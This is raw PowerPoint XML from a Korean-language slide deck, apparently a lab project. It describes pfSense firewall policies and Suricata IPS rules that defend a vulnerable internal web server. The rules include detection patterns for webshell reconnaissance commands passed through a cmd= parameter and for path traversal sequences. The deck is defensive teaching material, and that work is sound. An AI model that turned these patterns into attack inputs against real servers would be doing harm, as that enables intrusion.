        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="1037844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네트워크 흐름 제어 및 외부 서비스 연결 정책</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Shape 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8553692" y="1657809"/>
            <a:ext cx="3379808" cy="2278974"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1744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Shape 89"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8563311" y="1666358"/>
            <a:ext cx="3361445" cy="32645"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A855F7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Shape 90"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8572930" y="2194507"/>
            <a:ext cx="3361445" cy="777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Shape 91"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8712603" y="1795499"/>
            <a:ext cx="375627" cy="356527"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 59952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  <a:effectLst>
            <a:outerShdw blurRad="101600" dist="12700" dir="16200000" algn="bl" rotWithShape="0">
              <a:srgbClr val="A855F7">
                <a:alpha val="15000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst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4" name="Image 9" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect t="-840" b="-840"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8815834" y="1895046"/>
            <a:ext cx="181889" cy="160174"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text 92"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9219160" y="1787610"/>
            <a:ext cx="1330061" cy="23550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Firewall</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text 93"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9219160" y="2022341"/>
            <a:ext cx="1275845" cy="12980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C4B5FD">
                    <a:alpha val="80000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="Noto Sans KR"/>
                <a:ea typeface="Noto Sans KR"/>
                <a:cs typeface="Noto Sans KR"/>
              </a:rPr>
              <a:t>WAN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900">
                <a:solidFill>
                  <a:srgbClr val="C4B5FD">
                    <a:alpha val="80000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="Noto Sans KR"/>
                <a:ea typeface="Noto Sans KR"/>
                <a:cs typeface="Noto Sans KR"/>
              </a:rPr>
              <a:t>인터페이스 정책</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="그룹 16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8712601" y="2273597"/>
            <a:ext cx="3108557" cy="1536239"/>
            <a:chOff x="8255863" y="2148762"/>
            <a:chExt cx="3250518" cy="2551896"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Shape 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8255863" y="2148762"/>
              <a:ext cx="3250518" cy="767325"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 18741"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0F172A">
                <a:alpha val="3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Text 21"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8570418" y="2573884"/>
              <a:ext cx="2460984" cy="233044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WAN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인터페이스는 </a:t>
              </a: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Default Deny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정책 적용</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Shape 22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8255863" y="3048541"/>
              <a:ext cx="3250518" cy="1652117"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 18741"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0F172A">
                <a:alpha val="3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Text 23"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8570417" y="3574711"/>
              <a:ext cx="2860641" cy="100747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IPv4 ICMP</a:t>
              </a:r>
            </a:p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  →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네트워크 상태 확인</a:t>
              </a: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(Ping)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및 운영 편의성 목적</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="0"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Any → 172.16.0.0/24 (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제한적 허용</a:t>
              </a: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)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="0"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  →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상위 네트워크</a:t>
              </a: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(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사내 공용망</a:t>
              </a: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)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에서 내부 서버 접근 허용</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" lvl="0" indent="0" algn="l">
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="900"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="Text 53"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8570418" y="2263540"/>
              <a:ext cx="1232611" cy="21031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100" b="1">
                  <a:solidFill>
                    <a:srgbClr val="F1F5F9"/>
                  </a:solidFill>
                  <a:latin typeface="Noto Sans KR"/>
                  <a:ea typeface="Noto Sans KR"/>
                  <a:cs typeface="Noto Sans KR"/>
                </a:rPr>
                <a:t>기본 정책</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1100"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Text 54"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8570418" y="3227815"/>
              <a:ext cx="982923" cy="21031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100" b="1">
                  <a:solidFill>
                    <a:srgbClr val="F1F5F9"/>
                  </a:solidFill>
                  <a:latin typeface="Noto Sans KR"/>
                  <a:ea typeface="Noto Sans KR"/>
                  <a:cs typeface="Noto Sans KR"/>
                </a:rPr>
                <a:t>허용 트래픽</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1100"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="27" name="Image 10" descr="preencoded.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId4">
              <a:alphaModFix amt="80000"/>
            </a:blip>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="8355991" y="2309960"/>
              <a:ext cx="114300" cy="157693"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="28" name="Image 11" descr="preencoded.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId5">
              <a:alphaModFix amt="80000"/>
            </a:blip>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="8361018" y="3268736"/>
              <a:ext cx="114300" cy="169391"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Shape 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8563311" y="4129569"/>
            <a:ext cx="3379808" cy="2378738"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1744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91363" y="1657808"/>
            <a:ext cx="7943489" cy="2322879"/>
            <a:chOff x="371246" y="1537106"/>
            <a:chExt cx="7582205" cy="4949647"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4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33" name="Shape 89"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8572930" y="4139183"/>
            <a:ext cx="3361445" cy="36710"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A855F7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4" name="Shape 90"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8572930" y="4736391"/>
            <a:ext cx="3361445" cy="8741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5" name="Shape 91"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8718090" y="4302628"/>
            <a:ext cx="364652" cy="364473"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 59952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  <a:effectLst>
            <a:outerShdw blurRad="101600" dist="12700" dir="16200000" algn="bl" rotWithShape="0">
              <a:srgbClr val="A855F7">
                <a:alpha val="15000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst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6" name="Image 9" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6"/>
          <a:srcRect t="-840" b="-840"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8821908" y="4403857"/>
            <a:ext cx="181889" cy="164318"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Text 92"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9228779" y="4275533"/>
            <a:ext cx="1330061" cy="26483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Firewall</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Text 93"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9228779" y="4539492"/>
            <a:ext cx="1275845" cy="14596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C4B5FD">
                    <a:alpha val="80000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="Noto Sans KR"/>
                <a:ea typeface="Noto Sans KR"/>
                <a:cs typeface="Noto Sans KR"/>
              </a:rPr>
              <a:t>LAN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900">
                <a:solidFill>
                  <a:srgbClr val="C4B5FD">
                    <a:alpha val="80000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="Noto Sans KR"/>
                <a:ea typeface="Noto Sans KR"/>
                <a:cs typeface="Noto Sans KR"/>
              </a:rPr>
              <a:t>인터페이스 정책</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="57" name="그룹 56"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8712601" y="4828499"/>
            <a:ext cx="3108557" cy="1564918"/>
            <a:chOff x="8255863" y="2148762"/>
            <a:chExt cx="3250518" cy="2599537"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="58" name="Shape 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8255863" y="2148762"/>
              <a:ext cx="3250518" cy="1463609"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 18741"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0F172A">
                <a:alpha val="3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Text 21"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8570418" y="2582100"/>
              <a:ext cx="2875320" cy="905351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LAN → Any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기본 허용</a:t>
              </a:r>
            </a:p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 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→ 내부 서버 및 보안 장비 간 통신 보장</a:t>
              </a:r>
            </a:p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LAN → 10.8.0.0/24 (OPT1/OpenVPN)</a:t>
              </a:r>
            </a:p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  → VPN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터널 구간과 내부망 연동 허용</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="Shape 24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8255863" y="3722231"/>
              <a:ext cx="3250518" cy="1026068"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 18741"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0F172A">
                <a:alpha val="3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3" name="Text 25"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8570417" y="4136121"/>
              <a:ext cx="2875319" cy="475011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IPv4 ICMP Any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허용</a:t>
              </a:r>
            </a:p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 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→ 네트워크 장애 분석 및 트러블슈팅 목적</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64" name="Text 53"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8570418" y="2239335"/>
              <a:ext cx="1232611" cy="21031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100" b="1">
                  <a:solidFill>
                    <a:srgbClr val="F1F5F9"/>
                  </a:solidFill>
                  <a:latin typeface="Noto Sans KR"/>
                  <a:ea typeface="Noto Sans KR"/>
                  <a:cs typeface="Noto Sans KR"/>
                </a:rPr>
                <a:t>내부 트래픽 허용</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1100"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="66" name="Text 55"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8570418" y="3832309"/>
              <a:ext cx="1014070" cy="21031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lvl="0">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" b="1">
                  <a:solidFill>
                    <a:srgbClr val="F1F5F9"/>
                  </a:solidFill>
                  <a:latin typeface="Noto Sans KR"/>
                  <a:ea typeface="Noto Sans KR"/>
                  <a:cs typeface="Noto Sans KR"/>
                </a:rPr>
                <a:t>운영 트래픽</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="67" name="Image 10" descr="preencoded.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId4">
              <a:alphaModFix amt="80000"/>
            </a:blip>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="8361018" y="2291412"/>
              <a:ext cx="114300" cy="158236"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="69" name="Image 12" descr="preencoded.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId7">
              <a:alphaModFix amt="80000"/>
            </a:blip>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="8361018" y="3889950"/>
              <a:ext cx="114300" cy="152671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399103" y="4085662"/>
            <a:ext cx="7943489" cy="2469194"/>
            <a:chOff x="371246" y="1537106"/>
            <a:chExt cx="7582205" cy="4949647"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42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3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4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5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6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7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8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9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0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52" name="그림 5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B808E6-8DB8-35AA-937C-3D53FA4C8B1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4" t="17723" r="-55" b="3452"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="434493" y="1692699"/>
            <a:ext cx="7861003" cy="2257134"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="54" name="그림 53" descr="텍스트, 폰트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D2CF96-8932-A9AB-6073-D7362F49AD2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94" r="-1" b="16026"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="441632" y="4120494"/>
            <a:ext cx="7853864" cy="23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39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0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38130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시나리오 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대응방안</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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현 상황 파악</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99" name="Text 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="38130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pfsense surcata</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="Shape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228904" y="2026383"/>
            <a:ext cx="4985840" cy="2540566"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 181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" name="Image 0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52373" y="2140302"/>
            <a:ext cx="152705" cy="188272"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="104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43458" y="2540504"/>
            <a:ext cx="133502" cy="164596"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105" name="Text 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="800785" y="2506795"/>
            <a:ext cx="4529219" cy="9220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3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기밀 문서 서버로의 접근은 완전 차단하였으나 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1300" b="1" dirty="0" err="1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사내게시판</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1300" b="1" dirty="0" smtClean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ko-KR" altLang="en-US" sz="13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13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웹 서버가 매우 취약한 상태</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Text 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="874492" y="2111767"/>
            <a:ext cx="2190902" cy="34159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서버 상태 파악</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="118" name="Image 1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43458" y="3635879"/>
            <a:ext cx="133502" cy="164596"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119" name="Text 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="800785" y="3593858"/>
            <a:ext cx="4529219" cy="9220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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1300" b="1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fSense</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="13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기반의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1300" b="1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Suricata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="13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1300" b="1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IPS를</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="13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구축하여, 게시판 서버를 대상으로 하는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1300" b="1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웹쉘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="13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1300" b="1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Path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="13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1300" b="1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Traversal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="13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, SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1300" b="1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Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="13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등의 웹 공격을 실시간으로 탐지 및 차단하는 보안 환경 조성을 목표로 함</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120" name="Text 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="866602" y="3222948"/>
            <a:ext cx="2190902" cy="34159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대응 목표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2078580"/>
            <a:ext cx="5975485" cy="2417122"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="124" name="오른쪽 화살표 123"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5349054" y="2924848"/>
            <a:ext cx="714299" cy="83752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25" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6216515" y="1629156"/>
            <a:ext cx="3339107" cy="24780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suricata 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정책 설정 </a:t>
            </a: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(IPS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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 모드</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans KR"/>
                <a:ea typeface="Noto Sans KR"/>
                <a:cs typeface="Noto Sans KR"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="126" name="Image 1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34231" y="3239300"/>
            <a:ext cx="178905" cy="1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8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0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38130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</a:t>
            </a:r>
            <a:r>
              <a:rPr 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시나리오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3000" b="1" kern="0" spc="-75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대응방안 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3000" b="1" kern="0" spc="-75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: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3000" b="1" kern="0" spc="-75" dirty="0" err="1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Suricata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3000" b="1" kern="0" spc="-75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IPS rules</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="3000" b="1" kern="0" spc="-75" dirty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99" name="Text 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="38130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pfsense surcata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4350" y="1825625"/>
          <a:ext cx="11096624" cy="4351339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1667457649"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="9744074">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1388749260"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="268364"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공격 유형</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="71883" marR="71883" marT="47922" marB="4792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Suricata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룰 코드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Full Syntax)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="71883" marR="71883" marT="47922" marB="4792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209290"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1476005">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr rtl="0"/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Webshell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차단</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="71883" marR="71883" marT="47922" marB="4792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drop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tcp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 any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any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 -&gt; 10.10.0.102 80 (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msg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:"LAB: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Webshell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 Command via URL Detected";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flow:to_server,established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http.uri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; content:"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cmd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=";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pcre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:"/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cmd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=(?:.*)(?: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ls|id|whoami|cat|uname|netstat|ifconfig|ip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\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s+a|pwd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)/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";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classtype:web-application-attack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; sid:1000013; rev:2;)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="71883" marR="71883" marT="47922" marB="4792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44974"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1130965">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr rtl="0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Path Traversal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차단</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="71883" marR="71883" marT="47922" marB="4792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drop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tcp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 any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any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 -&gt; 10.10.0.102 80 (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msg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:"LAB: Path Traversal Attempt Detected";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flow:to_server,established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http.uri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; content:"../";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pcre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:"/(\.\.\/|\.\.\\)/";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classtype:web-application-attack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; sid:1000014; rev:1;)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="71883" marR="71883" marT="47922" marB="4792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44355"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1476005">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr rtl="0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SQL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인젝션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 차단</a:t>
                      </a:r>
                    </a:p>
